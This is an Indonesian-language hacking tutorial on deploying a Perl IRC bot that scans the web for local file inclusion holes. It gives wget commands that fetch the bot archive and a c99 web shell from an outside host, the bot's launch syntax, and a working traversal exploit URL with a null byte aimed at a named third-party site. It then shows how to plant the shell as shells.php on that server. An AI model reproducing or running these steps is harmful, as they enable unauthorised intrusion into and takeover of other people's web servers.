Bot Scan LFI

aku buat bot lfi nya banyak dalam 1 folder biar lo gak capek² upload ke shells injectkan lo, cukup 1x aja 🙂
nama bot nya a – z

1. Siapkan shell yang support perl <-
2. Cari dir full write /tmp  ato  /var/tmp  ato  /dev/shm
3. wget http://www.rajawalitelevisi.com/tmp.tar.gz
4. tar -zxvf tmp.tar.gz
5. masuk ke Dir / Folder tmp
6. jalankan bot LFI

Command : perl a.txt host port botnick botident botchan yournick fakeproc

Contoh : perl a.txt irc.reload-x.org 6667 botlfi botident reload-x bogel /usr/sbin/httpd

7. tunggu aja bot lfi nya masuk ke server yg u load.
8. klo bot nya udah muncul ketik aja !help di channel.
9. bot lfi siap tempur hahahaha =))

Cara scan bot nya :
ketik di channel : !a buglfi dorklfi
Contoh : !a /index.php?option=com_ccnewsletter&controller= “com_ccnewsletter”

tunggu aja bot nya scan
klo bot nya keluar seperti di bawah ini :
(@LFI)(@GooGLe)(@SHell) http://jcarrier.celeonet.fr/sf/component/option,com_gcalendar/Itemid,4/view,gcalendar///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../tmp/kutubusuk%0000 (@Linux primo-web3.celeo.net 2.6.38.8-32.fc15.x86_64 #1 SMP Mon Jun 13 19:49:05 UTC 2011 x86_64)(@Kutubusuk)

itu berarti u dapet hasil scan nya 😛
buka mozilla u,terus copy paste aja tuh target yg keluar.
Contoh nya gini :

http://jcarrier.celeonet.fr/sf/component/option,com_gcalendar/Itemid,4/view,gcalendar///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../tmp/kutubusuk%0000

Copy paste aja di mozilla u.. ntar langsung masuk ke shells inject nya.
ketik : wget http://www.rajawalitelevisi.com/c99.txt -O shells.php;ls shells.php
klo keluar file -> shells.php <- brarti shells berhasil lo pasang 😛

klo udah, jadi target nya ini : http://jcarrier.celeonet.fr/sf/shells.php

-= Sekian =-